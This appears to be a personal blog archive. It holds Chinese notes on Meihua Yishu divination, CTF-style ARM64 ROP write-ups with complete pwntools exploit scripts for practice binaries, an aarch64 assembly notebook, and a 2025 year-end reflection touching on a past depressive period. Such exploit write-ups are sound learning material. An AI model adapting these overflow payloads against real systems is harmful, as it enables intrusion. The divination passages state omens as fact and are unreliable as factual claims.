从立春到惊蛰为寅月，从惊蛰到清明为卯月。<br /> 从清明到立夏为辰月，从立夏到芒种为巳月。<br /> 从芒种到小暑为午月，从小暑到立秋为未月。<br /> 从立秋到白露为申月，从白露到寒露为酉月。<br /> 从寒露到立冬为戌月，从立冬到大雪为亥月。<br /> 从大雪到小寒为子月，从小寒到立春为丑月。

十天干

甲乙东方木。丙丁南方火。戊己中央土。庚辛西方金。壬癸北方水。

<i>《五行大义》</i>中说：「大桡采五行之情，占斗机所建也，始作甲乙以名日，谓之干。作子丑以名月，谓之支。有事于天，则用日。有事于地，则用辰。阴阳之别，故有支干名也。」

十二地支

子水鼠，丑土牛，寅木虎，卯木兔，辰土龙，巳火蛇。<br /> 午火马，未土羊，申猴金，酉金鸡，戌土犬，亥水猪。

地支数：子一，丑二，寅三，卯四，辰五，巳六，午七，未八，申九，酉十，戌十一，亥十二。

有关为什么地支是从子开始计数，而天干要从甲开始计数？<i>《五行大义》</i>中记：「甲为干首，子为支初。相配者，太阳之气，动于黄泉之下，在建子之月，黄钟之律，为气之源。在子，故以子为先。万物湊出，于建寅之月，皆以见形。甲属此月，故以甲为先，而配子。见者为阳，故从干。未见者为阴，故从支。」

时辰所属

时辰	起始时间	结束时间
子时	23:00	01:00
丑时	01:00	03:00
寅时	03:00	05:00
卯时	05:00	07:00
辰时	07:00	09:00
巳时	09:00	11:00
午时	11:00	13:00
未时	13:00	15:00
申时	15:00	17:00
酉时	17:00	19:00
戌时	19:00	21:00
亥时	21:00	23:00

需要注意的是，按古人所用方法，时辰当用真太阳时（即是当地的区域时间）而非北京时间。当然也不必十分的严谨，追求分毫不差，更多的还是在于心念的确定。因为古人计时没有钟表，也是按照大致的时辰进行估算的。如恰好在中间的时间划分的节点上，认为是什么时辰，就可以取什么时辰。如果内心狐疑不定，则可以将十二时辰作十二支签，或写在纸条上，抽签决定也可以。

同样需要注意的是，在第二天和第二年的划分上，古人和今天的人也不同。子时是 23:00 到 1:00，如果按照当今的时间划分，23:00 应该属于今天，然而如果按照古人的时间划分，23:00 之后则算作第二天。同样，年数不可以按照阳历来划分，而是在立春之后才能算作第二年。

起卦

卦以八除

凡起卦不问数多少，即以八作卦数，过八数即以八数退除，以零数作卦，如一八除不尽，再除二八，三八，直至除尽八数，以零数作卦。如得八数整，即坤卦，更不必除也。

爻以六除

凡起动爻，以重卦总数除六，以零作动爻。如不满六，止用此数为动爻，不必再除。如遇六数，则除之一六，不尽再除二六、三六，直至除尽，以零数作动爻。若一爻动，则看此一爻，是阳爻则变阴爻，阴爻则变阳爻。取爻当以时加之。

阴阳爻变化之后的卦象即是变卦。阴阳爻动，代表着事物发生了变化，万事万物都是从阴变为阳，或者从阳变为阴，所以阴阳爻的变化，代表着事物发展的轨迹，变卦则代表事物的最终结果。

互卦

互卦只用八卦，不必取六十四卦名。互卦以重卦去了初爻及六爻，以中间四爻分作两卦，看得何卦。又云：乾坤无互，互其变卦。

:::note 八卦：由三个爻组成的卦，又称作经卦。<br /> 重卦：由两个八卦组成的六个爻的卦，称作重卦。<br /> 主卦：由起卦时的数字或感应直接得出，决定了整个事件的「基调」。主卦分为「体卦」（没有动爻的那个卦，代表自己/主方，它是静止的、受影响的）和「用卦」（带有动爻的那个卦，代表对方/事端，因为「动」代表事情的发生、变数、指向）。<br /> 互卦：由重卦的二爻、三爻、四爻，与三爻、四爻、五爻各构成一卦。互卦不使用重卦的卦名，即是不看作是六十四卦。代表事件的中间过程、隐情、细节。<br /> 变卦：主卦爻动以后的卦。代表事件的最终结果、结局、变动后的状态。<br /> 错卦：主卦的阴阳爻全部对调。代表立场替换、对手的看法、完全相反的可能性，即硬币的另一面，如果事情往完全相反的方向发展会怎样？<br /> 综卦：主卦倒过来。代表视角转换、反思、换个位置看问题，从局外人的角度审视。 :::

八卦是天地人三才所构成的，一为天，二为地，三为天地相交。所以三才代表着天地交生万物之后，呈现出来的定性状态，而八卦则代表万物的八种独立的性状，此时八卦就具备了模拟万物的性状的能力。如再将八卦两两相重，则代表了八种性状相遇之后所产生的变化。因此六十四卦代表着八种性状相交之后产生的六十四种境遇。

而起卦之后的动爻，则代表在该境遇（重卦）中所处于的时位。所以在<i>《易经》</i>占法中本卦可以看出大致的局势，而动爻则反应了人在这种局势之中所处于的时空点。

在<i>《梅花易数》</i>中又运用到了互卦，这是汉代易学解释易辞时所提出的理论。基于这一点原因，不少学者认为<i>《梅花易数》</i>实际上是汉代易学的遗法。如果从断占理法上来论，则互卦反映了事物的内核，或者中间的过程。因为互卦是重卦祛除上爻与初爻的卦，初爻代表着开始，上爻代表着结束，自然互卦代表着中间的过程。初爻代表着首，上爻代表着尾，所以互卦也可以代表着事物的内核。

:::important 体互用互的区别：体互有两个爻来自于体卦，用互有两爻来自于用卦。所以，体互代表与体卦关系密切的事物，用互卦代表与用卦关系密切的事物。

动爻位置的影响：在六个爻的变化中，初爻代表着事情的开端，动爻在初爻，不会影响到互卦。因此初爻代表着事情始作，吉凶未定。在二爻动时，则会影响到一个互卦。则说明从二爻开始，对于事情的发展的影响开始变大。在三爻四爻时，卦局中的两个互卦都会受到影响。因此在这两个爻位时，是事件改变最为关键的时期。到了第五爻时，时期趋于结果，因此影响力又开始逐步减弱。到了最终的六爻代表着事情已经终结。不会影响到互卦，代表着事物发展到了最后，吉凶已判，结局已定。

因此，当动爻出现在第三爻，第四爻时，往往代表着事情处于一个关键的转折期。同时这两个爻位，也代表着从下卦过渡到上卦的阶段。 :::

变卦取互 · 康节先生万物数

本卦有互卦，而变卦亦有互卦者，变后取互也。如纯乾纯坤无互，而以变卦取之。如康节二雀争枝占，本卦泽雷随，变泽火革，互卦天风姤，亦变后取互也。

乾坤无互，互其变卦。是因为纯乾卦纯坤卦的互卦，依旧是乾卦和坤卦，此时难以从互卦中提取出来更多的信息。所以需要从变卦的互卦中来取用。不过，实际上能够取变互的不仅仅只有乾坤两卦。

八卦图

连山和归藏分别是夏朝的易和商朝的易，现在已经失传。

:::important 因为现在所处的世界是后天世界，所以后天卦位对于我们起出来的卦有很强的影响。

如果把卦位比作一艘船的话，卦在船上，季令是风，如果是好的季令，那就是顺风，但如果风不好，卦位好的话也可以保命，待的来日风来运转。 :::

伏羲先天八卦（炁）

自阳（乾）而生，自阴（坤）而灭。

文王後天八卦（气）

古人讲究君子坐阵北方，面南而治，故八卦方位是上南下北左东又西。

记的时候，先记住四正位，剩下四余位就很好记了。

体用十八占

天时占

凡占天时，不分体用，全观诸卦，详推五行。离多主晴，坎多主雨；坤乃阴晦，乾主晴明。震多则春夏雷轰，巽多则四时风冽。艮多则久雨必晴，兑多则不雨亦阴。夏占离多而无坎，则亢旱炎炎；冬占坎多而无离，则雨雪飘飘。

全观诸卦者，谓互、变卦。五行谓离属火，主晴；坎为水，主雨。坤为地气，主阴；乾为天，主晴明。震为雷，巽为风。秋冬震多无制，亦有非常之雷；有巽佐之，则为风撼震动之应。艮为山云之气，若雨久，得艮则当止，艮者止也，亦土克水之义。兑为泽，不雨亦阴。

夫以造化之辨固难测，理数之妙亦可凭。是以乾象乎天，四时晴明；坤体乎地，一气惨然。乾坤两同，晴雨时变；坤艮两并，阴晦不常。

卜数有阳有阴，卦象有奇有偶。阴雨阳晴，奇偶暗重。坤为老阴之极，而久晴必雨；乾为老阳之极，而久雨必晴。若逢重坎重离，亦曰时晴时雨。坎为水必雨，离为火必晴。乾兑之金，秋高明清，冬雪凛冽。坤艮之土，春雨泽，夏炎蒸。<i>《易》</i>曰：「云从龙，风从虎。」又曰：「艮为云，巽为风。」艮巽重逢，风云际会，飞沙走石，蔽日藏山，不以四时，不必二用。

坎在艮上，布雾兴云；若在兑上，凝霜作雪。乾兑为霜雪霰雹，离火为日电虹霓。离为电，震为雷，重会而雷电俱作；坎为雨，巽为风，相逢则风雨骤兴。震卦重逢，雷惊百里；坎爻迭见，润泽九垓。故卦体之两逢，亦爻象之总断。

地天泰，水天需，昏蒙之象；天地否，水地比，黑暗之形。八纯离，夏必旱，四季皆晴；八纯坎，冬必寒，四时多雨。久雨不晴，逢艮则止；久晴不雨，得此亦然。

又若水火既济，火水未济，四时不测风云；风泽中孚，泽风大过，三冬必然雨雪。水山蹇，山水蒙，百步必须执盖；地风升，风地观，四时不可行船。离在艮上，暮雨朝晴；离互艮宫，暮晴朝雨。巽坎互离，虹霞乃见；巽离互坎，造化亦同。

又须推测四时，不可执迷一理。震离为电为雷，应在夏天；乾兑为霜为雪，验于冬月。天地之理大矣哉，理数之妙至矣哉。得斯文者，当敬宝之。

:::note 阴多则阴，阳多则云。比如坤艮都是土，也就是云，但区别在于坤是阴卦，艮是阳卦，所以艮可以是多云，但是坤不太可能是多云，而应该是阴。不过还是需要综合来看。 :::

饮食占

凡占饮食，以体为主，用为饮食。用生体，饮食必丰，体生用，饮食难就。体克用，则饮食有阻；用克体，饮食必无。体用比和，饮食丰足。又，卦中有坎则有酒，有兑则有食，无坎无兑则皆无。兑坎生身，酒肉醉饱。欲知所食何物，以饮食推之；欲知席上何人，以互卦人事推之。饮食人事类者，即前八卦内万物属类是也。

饮食篇

乾

夫乾之为象也，圆坚而味辛，取象乎卯，为牲之首，为马为猪。秋得之而食禄盛，夏得之则食禄衰。春为时新之物，水果蔬菜之属；冬为冷物，隔宿之食。有坎，乃江湖海味；有水，而蔬果珍馐。

艮

艮为土物同烹，离乃火边煎炙。秋为蟹，春为马，凡内必多肉，其味必辛。盛有瓦器，伴有金樽。其于菜也为芹，其于物也带羽，克出生回，食必鹅鸭；生克出入，野菜无名。

坤

坤其于坤也，远客至，故人来。所用必瓦器，所食米果土味。静则梨枣茄芋，动则鱼鲊鲜羊。无骨肉脯，杀亦为腌藏，亦为肚肠，遇客必妇人。克此必主口舌。克出生回，乃牲之味；克入生出，乃杂物之烹。见乾兑，细切薄皮，见震巽，而新生旧煮。其色黑黄，其味甘甜。水火并之，蒸饮而已。四时皆为米麦之味，必带麻姜。仔细推详，必有验也。

巽

巽之为卦，主文书束约之间，讲论之际，外客婚姻，故人旧交，或主远信近期。其色白青，其性曲直，其味酸，其象长。桃李木瓜，斋辣素食，为鱼为鸡，其豆其面。非济挚而得之，必锄掘而得之。有乾兑食之而致病，有坤得之非难。坎为炒菜蔬，离为炒茶，带坎于中，酒汤共食，其无生，半斋半荤。其在艮也，会邻里，有贵人，食物不多，适口而已。其桔柚菜果蔬，斫伐之山林带节。虎狗兔鹿，渔捕网罗，米麻面麦，克入杂食，克出羊肉，克入口舌是非阴灾，极不可食。其味甘甜，其色玄黄。

坎

坎为水象也，水近信至海内，味香，有细鳞，或四足。凡曰水族，必可饮食也。或闻萧鼓之声，或在礼乐之所。其色黑，其味咸。克出饮酒，生回食鱼。为豕、为目、为耳、为血。羹汤物味，酒食水酱。遇离而说文书，逢乾而为海味。

震

震之为卦，木属也。酒友疏狂，虚惊怪异。大树之果，园林之蔬。其色青，其味酸，其数多，会客少。或有膻臭之气，或有异香之肴。同离多主盐茶，见坎或为盐腊。

离

离则文书交易，亲戚师儒。坐中多礼貌之人，筵中总英才之士。其物乃煎烤炙烧，其间或茶盐。白日之夕，虽之以烛。春夏之际，凡物带花。老人莫食，心事不宁。少者宜之。宜讲论，即有益。为鸡、为雉、为蟹、为蛇。色赤味苦，性热而气香。逢坎而酒请有争，逢巽则炒菜而已。

兑

兑之为卦，其属白金，其味辛而色白。或远客暴至，或近交争来。凡动物刃砧，凡味必有辛辣，凡包裹腌藏。其于暴也，为韭、为芹、为菱；其于菜也，为葱、为韭。盛而有腥臭，旺而有羊鹅。坐间有僭越之人，或有歌娼之女。单则必然口舌，重则必然欢喜。生出多食，克出好事。

夫算其饮食，必须察其动静，故动则有，静则无。以体卦，下卦为己，卦上为人，卦下为，变为客；互之上为酒，下为食物。取象体之下为何食，变为客，体下食之不终，生体下吉。克体之不得食，他人克应亦难食。他人生，他人请。己生体生下，己请人。互受生，后不计杯勺。上体受生，客不计数。变生互，客有后至者；互生克，有先去者，取其日时，以互卦用矣。

Write-ups: ARM Architecture (ARM64 ROP) series

Sun, 11 Jan 2026 00:00:00 GMT

工欲善其事，必先利其器

Speedrun 异架构汇编

直接看我笔记就好了，虽然不是很详细，后面有时间的话我会再多写点的<i>/画大饼，很大很大的饼（bushi</i>

异架构环境搭建

由于我使用的是 Arch Linux，所以这里的搭建步骤都按照 Arch 的用法来写，不过实际上其它发行版的大致流程也大差不差的。

paru -S qemu-user-static qemu-user-static-binfmt

确保 binfmt 安装成功：

ls /proc/sys/fs/binfmt_misc/qemu-aarch64

创建 aarch64-rootfs:

paru -S debootstrap
sudo debootstrap --arch=arm64 bookworm /opt/aarch64-rootfs http://deb.debian.org/debian
sudo chroot /opt/aarch64-rootfs /bin/bash
uname -m # should result aarch64
apt update
apt install -y libcapstone4 # just install needed packages, for dynamically linked programs
exit

:::important 上面这个创建 aarch64-rootfs 然后安装软件包是为了解决非静态链接的异架构 ELF 文件无法运行的问题，至于具体安装什么软件包，也是取决于那个动态连接的文件用到了什么包，libcapstone4 只是举个例子，需要根据实际情况来判断。

如果给的是静态链接的 ELF 文件，则一般可以直接使用 qemu-aarch64-static ./file 来运行。

简单介绍一下 qemu-user 和 qemu-user-static 之间的区别，其实就是 qemu 本身是否静态链接。静态链接版本的会提供一些最基本的库，动态链接版本的则完全没有，就那么简单，所以一般使用 static 版本即可。

至于 binfmt 的作用，可以简单理解为隐藏了手动确认架构信息这些步骤，自动识别架构。这里我完全是为了图方便，因为手动设置架构的时候 chroot 没成功，改用 binfmt 就一次过了，太懒了，没深入研究哈哈哈，这种东西能跑就行<i>/逃</i> :::

Level 1.0

Information

Category: Pwn

Description

The goal of this level is quite simple: redirect control flow to the win function.

Write-up

经典栈溢出 plus 后门。

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    gdb,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "/challenge/level-1-0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    # launch(["qemu-aarch64-static", "-L", "/opt/aarch64-rootfs", FILE])
    target = process(["/challenge/run"])

    payload = flat(
        {
            0x7C: elf.sym["win"],
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Level 2.0

Information

Category: Pwn

Description

Now let's see about redirect control flow to multiple functions.

Write-up

嗯，是当年新手村那味儿没错了～满满的回忆哈哈哈。

简单说一下，调用函数会把返回地址保存在 LR 寄存器，函数 ret 差不多就是 x30 = LR, br x30，所以只要注意观察 epilogue 然后计算就好了。

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    gdb,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "/challenge/level-2-0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    # launch(["qemu-aarch64-static", "-L", "/opt/aarch64-rootfs", FILE])
    target = process(["/challenge/run"])

    payload = flat(
        {
            0x8C: elf.sym["win_stage_1"] + 0x8,
            0x1BC: elf.sym["win_stage_2"] + 0x8,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Level 3.0

Information

Category: Pwn

Description

What about passing arguments to multiple functions?

Write-up

Multiple stages + argument control, 回忆啊，都是回忆……

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "/challenge/level-3-0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    # launch(["qemu-aarch64-static", "-L", "/opt/aarch64-rootfs", FILE])
    target = process(["/challenge/run"])

    # 0x00000000004014c8: ldp x0, x1, [sp]; br x1;
    x0_x1_br_x1 = 0x00000000004014C8
    payload = flat(
        {
            0x61: x0_x1_br_x1,
            0x61 + 0x8: 0x1,
            0x61 + 0x10: elf.sym["win_stage_1"] + 0x8,
            0x191: x0_x1_br_x1,
            0x1A9: 0x2,
            0x1A9 + 0x8: elf.sym["win_stage_2"] + 0x8,
            0x2D1: x0_x1_br_x1,
            0x2E9: 0x3,
            0x2E9 + 0x8: elf.sym["win_stage_3"] + 0x8,
            0x411: x0_x1_br_x1,
            0x429: 0x4,
            0x429 + 0x8: elf.sym["win_stage_4"] + 0x8,
            0x551: x0_x1_br_x1,
            0x569: 0x5,
            0x569 + 0x8: elf.sym["win_stage_5"] + 0x8,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

The Cross-ISAs Notebook

Wed, 07 Jan 2026 00:00:00 GMT

ARM

Data processing

Data Moving

Similar to amd64, the mov instruction can be used. However, literal values must be prefixed with the # symbol!

mov x1, #0x1337

aarch64 registers are 64 bits in size, but the mov instruction only works with 16 bit immediate values.

In order to move larger literal values, the mov and movk instructions are needed.

movk loads a value into the destination register with a specific bitshift, retaining all other bytes.

mov x1, #0xbeef
movk x1, #0xdead, lsl #16

Results in x1 containing the value 0xdeadbeef.

Load / Store

Memory addresses cannot be directly accessed in aarch64. Only registers can be operated on.

Values must be loaded from memory to a register with ldr and written back to memory via str.

For example, to increment a value located at memory address 0x1337, the following instructions would be needed:

mov x1, #0x1337
ldr x0, [x1]
add x0, x0, #1
str x0, [x1]

Locations memory addresses can also be offset from. Example:

mov x1, #0x4000
ldr x0, [x1, #8]

Would load 8 bytes stored at 0x4008 into x0.

Consecutive memory addresses can be loaded and stored in a single instruction as a pair:

ldp x0, x1, [sp]
stp x0, x1, [sp]

Above is equivalent to the following instructions:

ldr x0, [sp]
ldr x1, [sp, #8]
str x0, [sp]
str x1, [sp, #8]

Stack

aarch64 does not have the push/pop instructions to work with the stack, instead, you must use ldr and str to retrieve values from the stack.

Fortunately, both ldr and str have the ability to increment the address passed in pre/post access.

This feature can be used to perform the same action:

Popping the stack would be of the form:

ldr x1, [sp], #16

This loads the value located at the stack pointer into register x1 and then adds 16 to the stack.

Pushing to the stack would be of the form:

str x1, [sp, #-16]!

This subtracts 16 from the stack pointer and then stores the value in x1 at sp.

:::note In aarch64, the stack pointer must be 16 byte aligned! Accessing the stack pointer when it is not properly aligned will result in a fault!

There is different syntax for accessing memory at an offset, pre-indexing, and post-indexing. All of these forms are used extensively in aarch64. :::

Arithmetic Instructions

Arithmetic instructions take three arguments:

add x0, x1, x2

This is equivalent to x0 = x1 + x2.

madd x0, x0, x1, x2

This is equivalent to x0 = x2 + (x0 * x1).

Modulo in aarch64 cannot be done in a single instruction.

r = a % b is equivalent to:

q = a / b
r = a - q * b

For example, calculate x0 = x0 % x1:

sdiv x2, x0, x1
msub x0, x2, x1, x0

Branch Instructions

Loops can be created using conditional branch instructions.

The branch instruction in aarch64 is b.

To conditionally branch a dot suffix (ex: .gt) is appended resulting in b.gt. This would be equivalent to jg in amd64.

Functions

Function calls in aarch64 are done with the branch and link instruction bl.

The functions return value is stored in register x0.

The bl instruction:

does a PC relative jump the specified location
and stores the return address in the link register lr (aka x30)

It is the caller's responsibility to store the existing lr value frame pointer and any needed values in x0 - x15.

Registers x16 - x18 will be discussed later.

Registers x19 - x28 are callee saved.

The saved return address is stored in a special link register lr (aka x30).

The saved frame pointer is stored in a special frame register fp (aka x29).

Given the role of x29 and x30, it is common to see a function prologue similar to:

stp x29, x30, [sp, #-48]!
mov x29, sp

Here, the stack pointer is decremented to create a function frame and lr and fp are stored on the stack. The last instruction shown sets the frame pointer.

Note that the stack pointer and frame pointer are equal in this case. Local variables are stored ABOVE the frame pointer. The stack pointer may decrement further when passing arguments via the stack or for dynamic stack allocations (alloca).

Similarly, a function epilogue consists of:

ldp x29, x30, [sp], #48
ret

Which restores lr, fp and the stack before returning.

Example 1

Function form calc_avg(ptr, count)

where:

ptr is the start of the array
count is the number of 64 bit numbers in the array

mov x0, ptr
mov x1, 64
bl calc_avg

calc_avg:
    stp x29, x30, [sp, #-0x10]!
    mov x29, sp
    mov x2, xzr // sum = 0
    mov x3, x1  // original_count = count
loop:
    cbz x1, done
    ldr x4, [x0], #0x8
    add x2, x2, x4
    subs x1, x1, #0x1
    b.ne loop
done:
    sdiv x0, x2, x3
    mov sp, x29
    ldp x29, x30, [sp], #0x10
    ret

Example 2

Function form fib(pos)

where:

pos is position in the fibonacci sequence

// fib(0) = 0
// fib(1) = 1
// fib(n) = fib(n-1) + fib(n-2)

fib:
    stp x29, x30, [sp, #-0x10]!
    mov x29, sp
    cbz x0, .ret0       // if pos == 0, return 0
    cmp x0, #0x1
    b.eq .ret1          // if pos == 1, return 1

    mov x1, #0x0        // prev = 0x0
    mov x2, #0x1        // curr = 0x1
    mov x3, x0          // counter = pos
.loop:
    add x4, x1, x2      // next = prev + curr
    mov x1, x2          // prev = curr
    mov x2, x4          // curr = next
    subs x3, x3, #0x1
    cmp x3, #0x1
    b.gt .loop

    mov x0, x2          // return curr
    mov sp, x29
    ldp x29, x30, [sp], #0x10
    ret
.ret0:
    mov x0, xzr
    mov sp, x29
    ldp x29, x30, [sp], #0x10
    ret
.ret1:
    mov x0, #0x1
    mov sp, x29
    ldp x29, x30, [sp], #0x10
    ret

References

MIPS

TODO

2025 年终总结

Thu, 01 Jan 2026 00:00:00 GMT

<s>明天是快乐星期五，好耶，又不用上课了～</s>

总览 | 在不确定中持续推进

路边的银杏叶已经落得差不多了。秋天走得很安静，却也没能逃过我的眼睛。老实说，现在并没有什么写作的热情和积极性，不过也无所谓，先写着再说。没有心情也是一种心情，冬天果然是忧郁的季节。此刻，不兴奋，也谈不上什么低落，确实很难找到一个准确的词来形容当下的状态，或许是我还没准备好和这一年正式告别吧？umm... 应该不止是这样……啊，光阴你这个老吉普赛人，从不为任何人停留。

按照惯例，以往<s>（其实只是去年）</s>哪次不是一脸茫然地开始，然后写着写着就停不下来……？尽管我有种预感今年会写的很平淡，无趣，没有多少色彩。

老样子，想到什么写什么，能写到哪算哪吧。就算最后只能留下几段零散的记录，那也能够反映出这一年真实的一面。起码是我想记住的那一面。

技术 | 向更深处下潜

很意外，GPT 在年度报告里给我写了一首诗：

你在汇编与堆的迷宫中穿行，<br /> 以理性的火焰点亮每次调试的黎明。<br /> 从「Flush or Be Flushed」的轻笑到「解链之诗」的回声，<br /> 你以巧思织出知识的长廊，<br /> 让每一次 exploit，都成为一首诗。

~~确实，我追求写出更优雅的 exp，不过 GPT 也就只懂这点了……~~

还给我作了一幅 pixel art, 挺好看的，只是不能保存……

开源版图

首先依旧是常规展厅，~~看到下面这张图片你应该知道要怎么做（疯狂暗示）~~

依旧是那个喜欢造轮子的少年。因为调试没有符号表，我手搓了一个工具用于解决各种 glibc 相关的问题，但没想到搓完才发现已经有类似的工具了……功课没做好。因为课程提供的 kernel exploitation lab 不好用，我搓了一个更完善的环境……什么时候我可以做出点真正创新的东西呢？~~虽然我并不是特别关心这个。~~

漏洞挖掘

一年一个 CVE 是吧，你说我运气多好（bushi

如果我没记错，这个 spotify 客户端的 DoS 漏洞 CVE-2025-60939 应该是今年最黑暗的那段时光即将结束的时候，捡到的意外小惊喜。这是我第一次提交的漏洞被送到 CNA 手里，还是很高兴的。不过话说 CNA 效率那么低吗，我大概是八月底上报的，到现在已经过去了快四个月了还没分析出结果嘛？虽然期间 spotify 客户端也更新了好几次，却始终未见修复这个漏洞……

btw, 收到审核通过的邮件的时间是 1024，也是 GeekCon 2025，美妙的日子 :P

技术分享

Seebug Paper

本来只是闲得没事，想给自己的博客刷点流量，就把几个月前写的文章投到了 seebug paper，但没想到居然能过，送了件体恤 lol

附上链接：https://paper.seebug.org/3414/

RedQueen 茶话会

第一次将讲课内容分享出去，不太习惯。~~我有没有当讲师的天赋？~~

我好菜啊

咱也没啥远大的理想，但这个问题，五年后我会再问你一遍的，臭小子。

粗略算了一下，大概是用六个月时间把 Pwn 基本的主线内容都学完了，从栈到堆，最后是内核，这一路走来属实不易。虽然最后回望发现投入的时间好像并不是很久，但这期间发生了不少糟糕的事情——家人的否定，自己的不自信以及面对未知的恐惧，奇奇怪怪的假想敌等……我不知道有多少次曾想过放弃，放弃我所拥有的一切……但在不断的挣扎中，以及好友们的支持下，最后还是成功活了下来。

这里还是要特别感谢一下我的大可爱 vlex，每次年终总结都少不了的人 xD 在我每天都只能传播负能量的那段时间，依旧耐心地开导我，陪我度过了那段最黑暗的时光。没有他的帮助，我真不知道自己会走向何种极端……

想起刚开始学 heap 的时候，由于网上学习资料实在是太少了，散乱又无体系，根本不知道从何下手，加之学 heap 之前就听说这是一大分水岭，各种有关 heap 有多难的声音无不影响着我对它的感性认知，加重了我的恐惧……从第一次看 glibc 源码的怀疑人生，到度过一个又一个瓶颈期后发现就单纯的学 Pwn 来说其实也没有那么难，~~现在我都有一套自己的速通焚诀了。~~

难只是因为这一切都得靠自己，这条路很难有人可以，并且愿意带你的，对于大多数人来说，都只能自己摸索出一条路来。除了热爱，还需要勇气，<s>和二进制死磕一辈子的勇气，以后可能吃不上饭的勇气……</s>其中，运气也占据了相当大一部分的比例，运气好就会少走很多弯路。

我这个人还是太喜欢确定和稳定性而惧怕复杂和不确定性了，不过这些都是正常人会有的缺点吧？但暑假的那段时间我却用幼稚的二级化将自己困在简单的世界里……我本能地畏惧对于未知的不确定性，对于这些命题的分析总是浅尝辄止，轻易走向极端。

不清楚自己是否适合又怎样，试试又怎样，失败了又怎样呢？

虽说最后算下来只学了五个月，但是实际上期间还有六个月的 gap 期啥也没学，因为对自己大学一开始的路线规划的有问题，我一整个上半年都沉溺在某种「安稳」中，没怎么去思考。直到暑假（貌似每到放长假我都会抽风去想些奇奇怪怪的东西？）……问题逐渐暴露，我意识到自己的处境其实并不乐观。

我曾经把未来看得过于简单，在这种朴素的幻想被击碎之后又陷入了严重的焦虑，从来没有对自己和自身的处境形成过客观的评估，加上那段时间还有各种各样的琐事推着我走，心态也是过山车，反复崩溃又试图用理性去掌控自己，别提多难受了……嗯……最严重的时候真想找个地方安静的死去，有段时间吃个饭连手里的筷子都握不住，每天早上一觉醒来就是一阵要完蛋的感觉<s>（奇怪的是那段时间我的睡眠质量还是可以的，并没有因为各种屁事影响到自己的睡眠……虽然精神状态极其糟糕，但我还是可以做到连续几天啥也不干，从早睡到晚，以此来逃避现实）</s>……属于是我这辈子最黑暗的两个多月了哈哈哈。不知道以后会不会有更黑暗的时光，我的人生才刚刚开始……

